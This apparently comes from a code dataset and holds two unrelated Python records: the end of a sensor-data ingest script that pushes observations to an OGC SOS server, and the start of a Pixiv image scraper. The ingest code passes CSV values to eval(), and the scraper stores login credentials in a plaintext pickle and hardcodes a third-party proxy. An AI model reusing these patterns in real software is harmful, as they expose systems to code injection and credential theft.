'status']\r\n\r\nofferkey = [\r\n ['id', \"./ns5:identifier\", 1],\r\n ['name',\"./ns5:name\", 1],\r\n ['procedure',\"./ns5:procedure\",1],\r\n ['proc_fmt',\"./ns5:procedureDescriptionFormat\",5],\r\n ['obsprop',\"./ns5:observableProperty\",5],\r\n ['respfmt',\"./ns0:responseFormat\",7],\r\n ['obstype',\"./ns0:observationType\",1],\r\n ['featureofinttype',\"./ns0:featureOfInterestType\",1],\r\n ['phenombegin',\"./ns0:phenomenonTime/ns6:TimePeriod/ns6:beginPosition\",1],\r\n ['phenomend',\"./ns0:phenomenonTime/ns6:TimePeriod/ns6:endPosition\",1],\r\n ['resultbegin',\"./ns0:resultTime/ns6:TimePeriod/ns6:beginPosition\",1],\r\n ['resultend',\"./ns0:resultTime/ns6:TimePeriod/ns6:endPosition\",1]]\r\n\r\nnamespaces = {\r\n 'ns0':\"http://www.opengis.net/sos/2.0\",\r\n 'ns2':\"http://www.opengis.net/ows/1.1\",\r\n 'ns3':\"http://www.w3.org/1999/xlink\",\r\n 'ns4':\"http://www.opengis.net/fes/2.0\",\r\n 'ns5':\"http://www.opengis.net/swes/2.0\",\r\n 'ns6':\"http://www.opengis.net/gml/3.2\",\r\n 'xsi':\"http://www.w3.org/2001/XMLSchema-instance\",\r\n 'gda':\"http://www.opengis.net/sosgda/1.0\",\r\n 'gml':\"http://www.opengis.net/gml/3.2\"}\r\n\r\n#Functions\r\ndef create_offer_dict(noff):\r\n off_d = {}\r\n for field in offerkey:\r\n for i in range(field[2]):\r\n off_d[field[0]] = [j.text for j in noff.findall(field[1],namespaces)]\r\n return off_d\r\n\r\ndef parse_capabilities(url):\r\n r = ur.urlopen(url + \"?service=SOS&request=GetCapabilities\")\r\n tree = ET.parse(r)\r\n with open('debug/capabilities.xml','wb') as of:\r\n tree.write(of)\r\n root = tree.getroot()\r\n offerings_l = root.findall('./ns0:contents/ns0:Contents/ns5:offering/ns0:ObservationOffering',namespaces)\r\n offer_list = []\r\n for noffer in offerings_l:\r\n offer_dict = create_offer_dict(noffer)\r\n offer_list.append(offer_dict)\r\n return offer_list\r\n\r\ndef pull_capability_data(offer_list):\r\n with open('debug/offer.csv','w') as fo:\r\n fo.write(\"id,org,suborg,stationid,status,parameter,phenombegin,phenomend,resbegin,resend\\n\")\r\n unique_offers = []\r\n for i in offer_list:\r\n try:\r\n resbegin = i['resultbegin'][0]\r\n except IndexError:\r\n resbegin = \"\"\r\n try:\r\n resend = i['resultend'][0]\r\n except IndexError:\r\n resend = \"\"\r\n try:\r\n phenombegin = i['phenombegin'][0]\r\n except IndexError:\r\n phenombegin = \"\"\r\n try:\r\n phenomend = i['phenomend'][0]\r\n except IndexError:\r\n phenomend = \"\"\r\n nid = i['id'][0]\r\n nid_sp = nid.split(\":\")\r\n org=nid_sp[3]\r\n suborg=nid_sp[4]\r\n stationid=nid_sp[5]\r\n status=nid_sp[6]\r\n try:\r\n parameter=nid_sp[7]\r\n except IndexError:\r\n parameter=\"\"\r\n fo.write(\"{},{},{},{},{},{},{},{},{},{}\\n\".format(\r\n nid,org,suborg,stationid,status,parameter,phenombegin,phenomend,resbegin,resend))\r\n try:\r\n unique_offers.append((stationid,parameter,status,dateutil.parser.parse(phenomend,default=datetime(1950,1,1))))\r\n except ValueError:\r\n unique_offers.append((stationid,parameter,status,datetime(1950,1,1).isoformat()))\r\n return unique_offers\r\n\r\ndef get_url(sensor_id):\r\n global url\r\n if url == None:\r\n rows = db.query('''\r\n select o.sos_url from sensors s, organizations o\r\n where s.organization_id = o.organization_id\r\n and sensor_id = :id''', id=sensor_id)\r\n url = rows[0].sos_url\r\n\r\ndef get_data(sensor_id):\r\n q = db.query('select org_sensor_id, data_url from sensors where sensor_id = :id', id=sensor_id)\r\n url = q[0].data_url\r\n r = urllib.request.urlopen(url)\r\n open(\"data/{}.csv\".format(sensor_id), 
'wb').write(r.read())\r\n org_sensor_id = q[0].org_sensor_id\r\n return org_sensor_id\r\n\r\ndef qa_rules(sensor_id):\r\n qa = []\r\n q = db.query('select * from all_sensor_quality_checks where sensor_id = :id', id=sensor_id)\r\n for r in q:\r\n qa.append(r.as_dict())\r\n return qa\r\n\r\ndef is_qa_applied(sensor_id):\r\n q = db.query('select qc_rules_apply from sensors where sensor_id = :id', id=sensor_id)\r\n return q[0].qc_rules_apply\r\n\r\ndef get_header(sensor_id):\r\n fieldnames = None\r\n with open('data/' + str(sensor_id) + '.csv') as csvfile:\r\n f = csv.DictReader(csvfile)\r\n fieldnames = f.fieldnames\r\n return fieldnames\r\n\r\ndef write_config(sensor_id, org_sensor_id, fields):\r\n json = '{\"type\":1,\"columns\":['\r\n for n in fields:\r\n json = json + '\"' + n + '\",'\r\n json = json[:-1] + '],\"station\":\"' + org_sensor_id + '\",\"header\":1}'\r\n open('config/' + str(sensor_id) + '.json', 'w').write(json)\r\n\r\ndef get_station_metadata(sensor_id):\r\n station = db.query('''\r\n select stationid, \"shortName\", \"longName\", easting, northing, altitude,\r\n \"organizationName\", \"organizationURL\",\r\n\tcontact, \"waterbodyType\", \"urn-org\", suborg\r\n from sos.all_sensors s where sensor_id = :id''', id=sensor_id)\r\n return station.as_dict()\r\n\r\ndef get_parameter_metadata(sensor_id, fields):\r\n params = []\r\n parameter = db.query('''\r\n select parameter_name, unit_name, parameter_column_id,\r\n lower(data_qualifier_name) as status from all_sensor_parameters where sensor_id = :id''', id=sensor_id)\r\n for r in parameter:\r\n d = {'parameter':r.parameter_name,'parameterName':r.parameter_name,'parameterUnit':r.unit_name,'fieldName':fields[r.parameter_column_id - 1],'status':r.status}\r\n params.append(d.copy())\r\n return params\r\n\r\ndef create_station_request(template, stationmeta, parammeta):\r\n \"\"\"\r\n Purpose: Create the text of the xml for a station/sensor\r\n Input: station meta data (as list of dictionaries)\r\n Output: text file used for station push\r\n \"\"\"\r\n lookup={\r\n #'Sequence':stationmeta['Sequence'].lower(),\r\n 'suborg':stationmeta['suborg'].lower(),\r\n 'stationid':stationmeta['stationid'].lower(),\r\n 'shortName':stationmeta['shortName'].lower(),\r\n 'longName':stationmeta['longName'],\r\n 'easting':stationmeta['easting'].lower(),\r\n 'northing':stationmeta['northing'].lower(),\r\n 'altitude':stationmeta['altitude'].lower(),\r\n 'parameter':parammeta['fieldName'].lower(),\r\n 'parameterName':parammeta['parameterName'],\r\n 'parameterUnit':parammeta['parameterUnit'],\r\n 'fieldName':parammeta['fieldName'],\r\n 'organizationName':stationmeta['organizationName'],\r\n 'organizationURL':stationmeta['organizationURL'],\r\n 'contact':stationmeta['contact'],\r\n 'waterbodyType':stationmeta['waterbodyType'],\r\n 'publisher':stationmeta['urn-org'].lower(),\r\n 'status':parammeta['status'].lower(),\r\n 'urn-org':stationmeta['urn-org'].lower()}\r\n #open the station template file and read the template as a string\r\n with open(template,'r') as fi:\r\n station_meta_str = fi.read()\r\n\r\n #the template is coded with lookups for the KEYS from each list element in stationmeta.\r\n #Create the lookup dictionary for the template LookupError\r\n #lookup = {k:stationmeta[k].lower() for k in metadata_headers}\r\n\r\n #replace the placeholders with corresponding information from the metadata\r\n new_station_meta_str = station_meta_str.format(**lookup)\r\n return new_station_meta_str\r\n\r\ndef push_template(station_str, url):\r\n \"\"\"\r\n Purpose: 
Push station or sensor to server\r\n Input: Station xml, url\r\n Output: None\r\n \"\"\"\r\n station_bytes = station_str.encode('utf-8')\r\n req = ur.Request(url)\r\n req.add_header('Content-Type','application/xml')\r\n req.add_header('charset','UTF-8')\r\n r = ur.urlopen(req,data=station_bytes)\r\n return r\r\n\r\ndef check_data(data_file,unique_offers,station_status):\r\n last_record = []\r\n station_list = [s[0] for s in unique_offers]\r\n station_match_flag = False\r\n station_sensor_flag = False\r\n\r\n with open(data_file,'r') as fr:\r\n r = csv.reader(fr)\r\n for i, row in enumerate(r):\r\n if i == 0:\r\n continue #skip header row\r\n else:\r\n station = row[0]\r\n parameter = row[3]\r\n #logging.debug(\"{} - Station: {} Parameter {}\".format(i,station,parameter))\r\n #check if station is in offering\r\n #stops when it finds a match, because offering should be unique\r\n if station in station_list:\r\n append_value = (\"sensor\",(station,parameter))\r\n for st, par, status, date in unique_offers:\r\n if station == st:\r\n if parameter == par:\r\n if status == station_status:\r\n append_value = (\"ok\",date)\r\n break\r\n else:\r\n append_value = (\"station_sensor\",(station,parameter))\r\n last_record.append(append_value)\r\n return last_record\r\n\r\ndef get_unique_station_sensor(data_file,date_filter):\r\n \"\"\"\r\n Input: data_file:csv file\r\n Output:\r\n \"\"\"\r\n with open(data_file,'r') as fi:\r\n r = csv.reader(fi)\r\n # new_csv_list=[]\r\n # new_csv_list.append([\"StationID\", \"Parameter\",\"NumberOfObs\",\"TimeObsString\"])\r\n station_sensor_list = []\r\n for i, row in enumerate(r):\r\n #Do we want to process it?\r\n if i == 0:\r\n continue\r\n else:\r\n j = i-1\r\n stationid = row[0]\r\n parameter = row[3]\r\n if not date_filter[j]:\r\n continue #or do something with it\r\n else:\r\n station_sensor_list.append((stationid,parameter))\r\n unique_station_sensor = set(station_sensor_list)\r\n return unique_station_sensor\r\n\r\ndef check_dates(data_file,last_record):\r\n date_filter=[]\r\n with open(data_file,'r') as fi:\r\n r = csv.reader(fi)\r\n for i, row in enumerate(r):\r\n #index offset 1 for last_record list\r\n j = i-1\r\n if i == 0:\r\n continue\r\n elif last_record[j][0] != 'ok':\r\n date_filter.append(True)\r\n else:\r\n date=row[1]\r\n time=row[2]\r\n date_time = dateutil.parser.parse(\"{} {}\".format(date,time))\r\n #process the date filter\r\n if date_time > last_record[j][1]:\r\n date_filter.append(True)\r\n else:\r\n date_filter.append(False)\r\n\r\n return date_filter\r\n\r\ndef accumulate_data(unique_station_sensor,data,date_filter):\r\n rolled_up_data = {}\r\n last_date = None\r\n with open(data,'r') as fi:\r\n r = csv.reader(fi)\r\n for i, row in enumerate(r):\r\n j = i-1\r\n if i == 0:\r\n continue\r\n else:\r\n if date_filter[j] and row[4] != \"\": #only process row if date_filter is true and value is not missing\r\n data_id = (row[0],row[3]) #(stationid,parameter)\r\n date_time = dateutil.parser.parse(\"{} {}\".format(row[1],row[2]))\r\n data_value = (datetime.isoformat(date_time),row[4])\r\n if last_date != date_time:\r\n last_date = date_time\r\n rolled_up_data.setdefault(data_id, {}).setdefault('values',[]).append(data_value)\r\n for k,v in rolled_up_data.items():\r\n count = len(v['values'])\r\n rolled_up_data[k]['count']=count\r\n return rolled_up_data\r\n\r\ndef create_data_request(data_template, k,v,status,urnorg,suborg):\r\n stationid = k[0]\r\n parameter = k[1]\r\n count = str(v['count'])\r\n values_str = \"\"\r\n for item in 
v['values']:\r\n values_str += item[0]\r\n values_str +=\",\"\r\n values_str += item[1]\r\n values_str += \";\"\r\n data = count + \";\" + values_str\r\n\r\n\r\n with open(data_template,'r') as fi:\r\n data_meta_str = fi.read()\r\n #replace the placeholders with corresponding information from the metadata\r\n new_data_meta_str = data_meta_str.format(\r\n stationid=stationid,\r\n parameter=parameter,\r\n status=status,\r\n suborg=suborg,\r\n urnorg=urnorg,\r\n data=data)\r\n return new_data_meta_str\r\n\r\ndef push_new_templates(data,last_record,date_filter,stationmeta,parammeta):\r\n alreadyprocessed = []\r\n with open(data,'r') as fi:\r\n for i,row in enumerate(fi):\r\n j = i-1\r\n if i == 0:\r\n continue\r\n elif not date_filter[j]:\r\n continue #skip data that is already in the database (OR DO SOMETHING WITH IT?)\r\n elif last_record[j] in alreadyprocessed:\r\n continue\r\n else:\r\n #check templates that need to be uploaded\r\n status = last_record[j][0]\r\n if status == 'station_sensor':\r\n # Get pertinent info\r\n station = last_record[j][1][0]\r\n parameter = last_record[j][1][1]\r\n station_record = None\r\n for record in stationmeta:\r\n if record['stationid'] == station:\r\n station_record = record\r\n break\r\n if station_record == None: \r\n continue #OR DO SOMETHING else\r\n #Create STATION template\r\n station_str = create_station_request(station_meta_template,station_record,parammeta[0])\r\n response = push_template(station_str, url)\r\n #logger.debug(\"Station {} template pushed with response {}\".format(station,response.readlines()))\r\n # PROCESS SENSOR TEMPLATE\r\n sensor_record = None\r\n sensor_param_record=None\r\n for record in stationmeta:\r\n if record['stationid'] == station:\r\n sensor_record = record\r\n break\r\n for record in parammeta:\r\n if record['fieldName'] == parameter:\r\n sensor_param_record = record\r\n break\r\n if sensor_record == None:\r\n continue #OR DO SOMETHING else\r\n if sensor_param_record == None:\r\n continue\r\n #Create sensor str\r\n sensor_str = create_station_request(sensor_meta_template,sensor_record,sensor_param_record)\r\n response = push_template(sensor_str, url)\r\n #logging.debug(\"Sensor {} template pushed with response {}\".format(parameter, response.readlines()))\r\n # PROCESS RECORD TEMPLATE\r\n result_record = None\r\n result_param_record=None\r\n for record in stationmeta:\r\n if record['stationid'] == station:\r\n result_record = record\r\n break\r\n for record in parammeta:\r\n if record['fieldName'] == parameter:\r\n result_param_record = record\r\n break\r\n if result_record == None:\r\n continue #OR DO SOMETHING else\r\n if result_param_record == None:\r\n continue\r\n #Create sensor str\r\n result_str = create_station_request(result_meta_template,result_record,result_param_record)\r\n response = push_template(result_str, url)\r\n #logging.debug(\"Result {} {} template pushed with response {}\".format(station, parameter,response.readlines()))\r\n alreadyprocessed.append(last_record[j])\r\n elif status == 'sensor':\r\n station = last_record[j][1][0]\r\n parameter = last_record[j][1][1]\r\n #lookup station parameter in metadata_headers\r\n # PROCESS SENSOR TEMPLATE\r\n sensor_record = None\r\n sensor_param_record=None\r\n for record in stationmeta:\r\n if record['stationid'] == station:\r\n sensor_record = record\r\n break\r\n for record in parammeta: \r\n if record['fieldName'] == parameter:\r\n sensor_param_record = record\r\n break\r\n if sensor_record == None: \r\n continue #OR DO SOMETHING else\r\n if 
sensor_param_record == None:\r\n continue\r\n #Create sensor str\r\n sensor_str = create_station_request(sensor_meta_template,sensor_record,sensor_param_record)\r\n response = push_template(sensor_str, url)\r\n #logging.debug(\"Sensor {} template pushed with response {}\".format(parameter, response.readlines()))\r\n # PROCESS RECORD TEMPLATE\r\n result_record = None\r\n result_param_record=None\r\n for record in stationmeta:\r\n if record['stationid'] == station:\r\n result_record = record\r\n break\r\n for record in parammeta:\r\n if record['fieldName'] == parameter:\r\n result_param_record = record\r\n break\r\n if result_record == None:\r\n continue #OR DO SOMETHING else\r\n if result_param_record == None:\r\n continue\r\n #Create sensor str\r\n result_str = create_station_request(result_meta_template,result_record,result_param_record)\r\n response = push_template(result_str, url)\r\n #logging.debug(\"Result {} {} template pushed with response {}\".format(station, parameter, response.readlines()))\r\n alreadyprocessed.append(last_record[j])\r\n\r\ndef chunk(sensorid,alldatafile):\r\n with open(alldatafile,'r') as fi:\r\n num_lines = sum(1 for line in fi)\r\n if num_lines <= 1:\r\n logging.error(\"No data to ingest for sensor Id:{}\".format(sensorid))\r\n exit()\r\n fi.seek(0)\r\n r = csv.reader(fi)\r\n filecount = 0\r\n counter = 1 #account for header\r\n eof = False\r\n next(fi)\r\n while eof == False:\r\n filecount += 1\r\n filename = \"{}.{}\".format(alldatafile, filecount)\r\n with open(filename,'w',newline=\"\") as fo:\r\n w = csv.writer(fo)\r\n w.writerow([\"station\",\"date\",\"time\",\"parameter\",\"value\"])\r\n for i,line in enumerate(r):\r\n counter += 1\r\n w.writerow(line)\r\n if counter == num_lines:\r\n eof = True\r\n if counter % CSVCHUNKSIZE == 0:\r\n break\r\n \r\ndef pivot(sensorid,qa):\r\n conf_file='config/{}.json'.format(sensorid)\r\n data_file='data/{}.csv'.format(sensorid)\r\n if qa != None:\r\n logging.debug(\"QA Applied for sensor Id:{}\".format(sensorid))\r\n alldatafile=\"data/{}.qa.csv\".format(sensorid)\r\n else:\r\n alldatafile=\"data/{}.raw.csv\".format(sensorid)\r\n \r\n with open(conf_file,'r') as fi:\r\n conf_str = fi.read()\r\n config = json.loads(conf_str)\r\n \r\n with open(data_file,'r') as fi:\r\n with open(alldatafile,'w', newline=\"\") as fo:\r\n r = csv.reader(fi)\r\n w = csv.writer(fo)\r\n w.writerow([\"station\",\"date\",\"time\",\"parameter\",\"value\"])\r\n columns = config['columns']\r\n station = config['station']\r\n datetimecol = columns.index(\"datetime\")\r\n header = config['header']\r\n\r\n for i,ncol in enumerate(columns):\r\n if ncol == \"datetime\":\r\n continue\r\n elif ncol == \"id\":\r\n continue\r\n else:\r\n for j,nrow in enumerate(r):\r\n if j < header:\r\n continue\r\n else:\r\n newrow = []\r\n dateX, timeX = nrow[datetimecol].split(' ',1)\r\n newrow.append(station) #station\r\n newrow.append(dateX) #date\r\n newrow.append(timeX) #time\r\n newrow.append(ncol) #parameter\r\n discard=False\r\n if qa != None:\r\n for q in qa:\r\n if q[\"parameter_column_id\"] == i+1:\r\n if eval(nrow[i] + q[\"quality_check_operand_name\"]+str(q[\"threshold\"])):\r\n logging.debug(\"Discarding sensor id {} value {} for {}\".format(sensorid, nrow[i],ncol))\r\n discard=True\r\n if discard == False:\r\n newrow.append(nrow[i])\r\n w.writerow(newrow)\r\n fi.seek(0)\r\n chunk(sensorid,alldatafile)\r\n\r\ndef update_status(sensorid, status):\r\n if status == 'complete':\r\n db.query(\"update sensors set ingest_status = 'ingested' where sensor_id = 
:id\", id=sensorid)\r\n if status == 'error':\r\n db.query(\"update sensors set ingest_status = :st where sensor_id = :id\", st=status, id=sensorid)\r\n if status == 'ingested':\r\n db.query(\"update sensors set ingest_status = :st, last_ingest = now(), next_ingest = now() + (20 * interval '1 minute') where sensor_id = :id\", st = status, id=sensorid)\r\n\r\ndef submit(filelist, parammeta, stationmeta, unique_offers, station_status):\r\n total_files = len(filelist)\r\n new_records = 0\r\n for i,nfile in enumerate(filelist):\r\n #logging.debug(\"Processing file {} of {}\".format(i+1,total_files))\r\n # Check data for missing templates\r\n #loop through the data file and determine what has to be done for each data point\r\n last_record = check_data(nfile,unique_offers,station_status) \r\n #create a list of which dates are before the offering date\r\n date_filter = check_dates(nfile, last_record) # could clean this up a bit\r\n #push any new templates that are needed\r\n push_new_templates(nfile,last_record,date_filter,stationmeta,parammeta)\r\n #process data, format data and push\r\n unique_station_sensor = get_unique_station_sensor(nfile,date_filter)\r\n #logging.debug('unique_station_sensor:{}'.format(unique_station_sensor))\r\n rolled_up_data = accumulate_data(unique_station_sensor,nfile,date_filter)\r\n new_records = new_records + len(rolled_up_data)\r\n if len(rolled_up_data) == 0:\r\n logging.debug('No NEW data to ingest')\r\n for k,v in rolled_up_data.items():\r\n for i in parammeta:\r\n if k[1] == i['fieldName']:\r\n status = i['status'].lower()\r\n break\r\n for i in stationmeta:\r\n if k[0] == i['stationid']:\r\n urnorg = i['urn-org'].lower()\r\n suborg = i['suborg'].lower()\r\n break\r\n data_meta_str = create_data_request(data_template, k,v,status,urnorg,suborg)\r\n response = push_template(data_meta_str,url)\r\n #logging.debug(\"-\",\"Results for {} pushed with response {}\".format(k,response.readlines()))\r\n return new_records\r\n\r\ndef remove_old_files(sensorid):\r\n filelist = glob(\"data/{}.*\".format(sensorid))\r\n for nfile in filelist:\r\n os.remove(nfile)\r\n \r\ndef process(sensorid):\r\n logging.debug(\"Ingesting Sensor Id: {}\".format(sensorid))\r\n update_status(sensorid,'running')\r\n get_url(sensorid)\r\n remove_old_files(sensorid)\r\n station = get_data(sensorid)\r\n #TODO:only if already doesn't exist\r\n write_config(sensorid, station, get_header(sensorid))\r\n\r\n #Request offering from server. 
Parse into a list of offerings.\r\n    offer_dict = parse_capabilities(url)\r\n\r\n    #Create a list of unique offerings (station, parameter, last measurement date/time)\r\n    unique_offers = pull_capability_data(offer_dict)\r\n\r\n    #Read station metadata csv file\r\n    stationmeta = get_station_metadata(sensorid)\r\n\r\n    #Read parameter metadata csv file\r\n    parammeta = get_parameter_metadata(sensorid, get_header(sensorid))\r\n\r\n    #Process original data\r\n    pivot(sensorid, None)\r\n    filelist = glob(\"data/{}.raw.csv.*\".format(sensorid))\r\n    new_records = submit(filelist, parammeta, stationmeta, unique_offers, parammeta[0][\"status\"])\r\n\r\n    if is_qa_applied(sensorid):\r\n        prelimparammeta = parammeta\r\n        for param in prelimparammeta:\r\n            param[\"status\"] = \"preliminary\"\r\n        pivot(sensorid, qa_rules(sensorid))\r\n        prelimfilelist = glob(\"data/{}.qa.csv.*\".format(sensorid))\r\n        submit(prelimfilelist, prelimparammeta, stationmeta, unique_offers, \"preliminary\")\r\n    logging.debug('{} records ingested for {}'.format(new_records,sensorid))\r\n    #use the function parameter, not the CLI-level args object\r\n    if new_records > 0:\r\n        update_status(sensorid, 'ingested')\r\n    else:\r\n        update_status(sensorid, 'complete')\r\n\r\nif __name__ == \"__main__\":\r\n    parser = argparse.ArgumentParser()\r\n    parser.add_argument(\"sensorid\", help=\"system sensor id\")\r\n    args = parser.parse_args()\r\n    logging.basicConfig(filename=\"../logs/{}.log\".format(args.sensorid), level=logging.DEBUG, format=\"%(asctime)s:%(levelname)s:%(message)s\")\r\n    try:\r\n        process(args.sensorid)\r\n    except Exception as e:\r\n        update_status(args.sensorid, 'error')\r\n        logging.critical(str(e)) \r\n        raise \r\n","sub_path":"src/app/ingest/ingest.py","file_name":"ingest.py","file_ext":"py","file_size_in_byte":27843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} {"seq_id":"278291119","text":"#! 
/usr/bin/env python\nimport requests,http,urllib\nimport sys,os,time\nimport re,pickle\nimport inspect\nimport signal\n\nimport myEnum\nimport threadPool\nimport pString\nimport makeLog\n\n\n#TODO:\timport bookmark [http://www.pixiv.net/bookmark.php?type=user&rest=show&p=%d](test/bookmark.html)\n\n\nproxies = {}\n#使用的代理\nuse_proxies = {\n\t\t\t\"http\": \"http://139.129.128.134:3128\",\n\t\t\t\"https\": \"http://139.129.128.134:3128\",\n\t\t\t}\n#是否使用代理下载(而不只是查询),因为下载图片和网页展示是不同的服务器\ndown_by_proxies = False\n#默认下载地址\ndefaultDir = r\"D:/图片/pixiv/\"\n#默认图片下载线程数,过大可能会被网站丢包\ndownThread = 16\n#用户配置文件\nuserFile = \"userFile.pickle\"\n#find时将每多少页为一个单元检测\nfind_gap = 5\n#等待间隔\nwait_gap = 2.5\n#\ndown_all = True\n\ndef getFuncName():\n\treturn inspect.stack()[1][3]\n#创建文件需要的父文件夹(们)\ndef createFile(filename):\n\tdirectory = \"\"\n\tname = \"\"\n\tfor c in filename:\n\t\tif c == '/':\n\t\t\tdirectory = name\n\t\tname += c\n\tif directory != \"\":\n\t\tif os.path.isdir(directory):\n\t\t\tpass\n\t\telse:\n\t\t\tos.makedirs(directory)\n#设置访问用http头\ndef makeHeader(url):\n\theaders = {\n\t'Referer': url\n\t}\n\treturn headers\n#定制下载用http头\ndef makeHeaderDown(url):\n\theaders = {\n\t'Range': 'bytes=0-99999999',\n\t'Referer': url,\n\t'Cache-Control':'max-age=0',\n\t'DNT':'1',\n\t'Connection':'keep-alive'\n\t}\n\treturn headers\n#判断文件是否已经存在并有意义\ndef fileExist(filename):\n\tif os.path.exists(filename) and os.path.getsize(filename) != 0:\n\t\treturn True\n\telse:\n\t\treturn False\n\n#用户信息存储类\nclass User:\n\tusername = ''\n\tpassword = ''\n\tfilename = ''\n\t#构造函数\n\tdef __init__(self, fname):\n\t\tself.filename = fname\n\t\tif os.path.exists(self.filename):\n\t\t\tself.__load()\n\t\telse:\n\t\t\tself.stdio()\n\t#读入\n\tdef __load(self):\n\t\tfd = open(self.filename, \"rb\")\n\t\tself.username = pickle.load(fd)\n\t\tself.password = pickle.load(fd)\n\t\tself.filename = pickle.load(fd)\n\t\tfd.close()\n\t\tprint(\"从文件中读入用户名和密码成功!\")\n\t#写入\n\tdef __dump(self):\n\t\tfd = open(self.filename, \"wb\")\n\t\tpickle.dump(self.username,fd)\n\t\tpickle.dump(self.password,fd)\n\t\tpickle.dump(self.filename,fd)\n\t\tfd.close()\n\t#从标准输入获得值\n\tdef stdio(self):\n\t\tself.username = input(\"username:\")\n\t\tself.password = input(\"password:\")\n\t\tself.__dump()\n#自定义错误,参数错误\nclass ParameterError(Exception):\n\tdef __init__(self, msg):\n\t\tException.__init__(self)\n\t\tself.message = msg\n\tdef __str__(self):\n\t\treturn str(self.message)\n#主功能类\nclass Spider:\n\t#构造函数\n\tdef __init__(self,logdir = \"lg\",prwork = True, prdown = True):\n\t\tself.__session = requests.session()\n\t\t#线程池\n\t\tself.__pool = {}\n\t\tself.__pool['find'] = threadPool.Pool(32)\n\t\tself.__pool['get'] = threadPool.Pool(16)\n\t\tself.__pool['down'] = threadPool.Pool(downThread)\n\t\tself.__pool['write'] = threadPool.Pool(128)\n\t\t#线程池使用的参数列表\n\t\tself.poolpara = {}\n\t\tself.poolpara['find'] = ['key','pageid','logfd']\n\t\tself.poolpara['get'] = ['id', 'adir', 'logfd']\n\t\tself.poolpara['down'] = ['id', 'url[]', 'refer[]', 'filename[]', 'logfd']\n\t\tself.poolpara['write'] = ['id', 'res[]', 'filename[]', 'logfd']\n\t\t#画师记录\n\t\tself.person = {}\n\t\tpass\n\t#登录\n\tdef login(self, user):\n\t\t#定义post的参数\n\t\treqdata={\n\t\t'mode':'login',\n\t\t'pass':user.password,\n\t\t'pixiv_id':user.username,\n\t\t'skip':'1'\n\t\t}\n\t\t#domain = r\"https://www.secure.pixiv.net/login.php\"\n\t\tdomain = r\"https://www.pixiv.net/login.php\"\n\t\tresponse = self.__session.post(domain, data = reqdata, proxies = 
proxies)\n\t\t#print(\"response\")\n\t\t#print(response)\n\t\t#判断是否登陆成功\n\t\tret = response.text.find(\"var user_id\") != -1\n\t\t#print(\"ret\");\n\t\t#print(ret);\n\t\treturn ret\n\t#登出\n\tdef logout(self):\n\t\tpass\n\t#从地址获取获取内容\n\tdef getHtml(self, domain, stream = False, timeout = 12.05, headers = None, retry = False, needLogin = True):\n\t\tcount = 0\n\t\tif needLogin == True:\n\t\t\treq = self.__session\n\t\telse:\n\t\t\treq = requests\n\t\twhile True:\n\t\t\tcount += 1\n\t\t\ttry:\n\t\t\t\tif headers:\n\t\t\t\t\tret = req.get(domain, stream = stream, headers = headers, proxies = proxies, timeout = timeout)\n\t\t\t\telse:\n\t\t\t\t\tret = req.get(domain, stream = stream, proxies = proxies, timeout = timeout)\n\t\t\t\t#data = \"%s %s\\n%\"(domain, ret.status_code)\n\t\t\t\t#with open(\"developer/getHtml.txt\",\"ab\") as fd:\n\t\t\t\t#\tfd.write(bytes(data, encoding = \"utf8\"))\n\t\t\t\tretlen = len(ret.content)\n\t\t\t\t#HTTP返回值错误\n\t\t\t\tif ret.status_code != 200:\n\t\t\t\t\tprint(domain,flush = True, end = \" \")\n\t\t\t\t\tprint(ret.status_code,flush = True)\n\t\t\t\t\tif ret.status_code in [404,403]:\n\t\t\t\t\t\tif retry: continue\n\t\t\t\t\t\tif count > 2:\n\t\t\t\t\t\t\tprint(\"ret None\",flush = True)\n\t\t\t\t\t\t\treturn None\n\t\t\t\t\t#print(ret.text)\n\t\t\t\t\ttime.sleep(2)\n\t\t\t\t\tcontinue\n\t\t\t\t#数据长度不一致错误\n\t\t\t\treqlen = ret.headers.get('Content-Length')\n\t\t\t\tif reqlen != None and retlen < int(reqlen):\n\t\t\t\t\tprint(\"Length Inconsistency\",flush = True);\n\t\t\t\t\tprint(\"domain: \",domain,flush = True)\n\t\t\t\t\tprint(reqlen,flush = True)\n\t\t\t\t\tprint(retlen,flush = True)\n\t\t\t\t\tprint(\"retry\",flush = True)\n\t\t\t\t\ttime.sleep(2)\n\t\t\t\t\tcontinue\n\t\t\t\t#print(ret.headers['Content-Length'])\n\t\t\t\treturn ret\n\t\t\texcept Exception as e:\n\t\t\t\t#为网络错误预留\n\t\t\t\tprint(\"domain: \",domain,flush = True)\n\t\t\t\tprint(e,flush = True)\n\t\t\t\tprint(\"retry\",flush = True)\n\t\t\t\tprint(inspect.stack()[1][3])\n\t\t\t\ttimeout *= 2\n\t\t\t\ttime.sleep(2)\n\t\t\t\tpass\n\t#获取cookies\n\tdef getcookies(self, domain = r\"\"):\n\t\tresponse = self.getHtml(domain)\n\t\treturn response.cookies.get_dict()\n\t#计数函数\n\tdef recount(self):\n\t\tself.__cnt = 0\n\tdef __count(self, num = 1):\n\t\tself.__cnt += num\n\tdef count(self):\n\t\treturn self.__cnt\n\t#添加任务\n\tdef add_job(self, pname, *args):\n\t\tif not pname in self.__pool:\n\t\t\traise ParameterError(\"%s为不存在的线程池\"%pname)\n\t\tif len(args) != len(self.poolpara[pname]):\n\t\t\terrmsg = \"add_job [%s] 的额外参数应为%d个 %s : %s\"%\\\n\t\t\t(pname, len(self.poolpara[pname]), self.poolpara[pname], args)\n\t\t\tParameterError(errmsg)\n\t\tif pname == \"find\":\n\t\t\tself.__pool[pname].add_job(self.findT, args[0], args[1], args[2])\n\t\telif pname == \"get\":\n\t\t\tself.__pool[pname].add_job(self.getT, args[0], args[1], args[2])\n\t\telif pname == \"down\":\n\t\t\tself.__pool[pname].add_job(self.downT, args[0], args[1], args[2], args[3], args[4])\n\t\telif pname == \"write\":\n\t\t\tself.__pool[pname].add_job(self.writeT, args[0], args[1], args[2], args[3])\n\t#设置线程池的状态参数\n\tdef set_stat(self, pname, name, value):\n\t\tif not pname in self.__pool:\n\t\t\traise ParameterError(\"%s为不存在的线程池\"%pname)\n\t\tself.__pool[pname].set(name, value)\n\t#获取线程池的状态参数\n\tdef get_stat(self, pname, name):\n\t\tif not pname in self.__pool:\n\t\t\traise ParameterError(\"%s为不存在的线程池\"%pname)\n\t\tret = self.__pool[pname].get(name)\n\t\treturn ret\n\t#等待下载任务结束\n\tdef wait_allcomplete(self, data = \"\"):\n\t\tglobal 
